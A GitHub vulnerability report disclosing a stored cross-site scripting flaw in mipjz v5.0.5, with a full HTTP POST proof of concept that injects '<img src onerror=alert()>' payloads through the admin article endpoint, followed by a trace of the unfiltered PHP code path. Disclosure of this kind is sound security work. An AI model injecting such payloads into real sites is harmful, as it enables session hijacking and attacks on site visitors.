sansanyun/mipjz

There is a cross site scripting (XSS) vulnerability exists in mipjz v5.0.5

sma11new opened this issue · 1 comments

sma11new commented

[Vulnerability Description]
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/

[Affected Product Code Base]
v5.0.5

[Vulnerability Proof]

  1. Add an article, insert js code in the description parameter: xss
POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
Host: 192.168.11.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
dataId: 
Content-Length: 426
Origin: http://192.168.11.102
Connection: close
Referer: http://192.168.11.102/index.php?s=/admin/
Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0

{"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss&lt;img src onerror=alert(1)&gt;","publish_time":"","fieldList":"[{\"value\":\"\",\"key\":\"diy_aaa\",\"name\":\"<img src onerror=alert(1)>\"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}

image

  1. Visit the article page, the code is loaded and executed

image

image

[Code Details]

  1. Add an article, receive parameters, and pass it to \app\article\model\Articles.php:itemAdd for processing

image

  1. \app\article\model\Articles.php:itemAdd does not check and filter the description, and directly stores it in the database

image

  1. Article Details \app\article\controller\ArticleDetail.php:index takes out the article description in the database and passes it to $mipDescription without filtering

image

  1. In the "guess you like" area in the article display \template\default\article\articleDetail.html, directly output the $mipDescription in the previous step, causing the malicious code to be executed

image

attritionorg commented

What level of authentication does this require?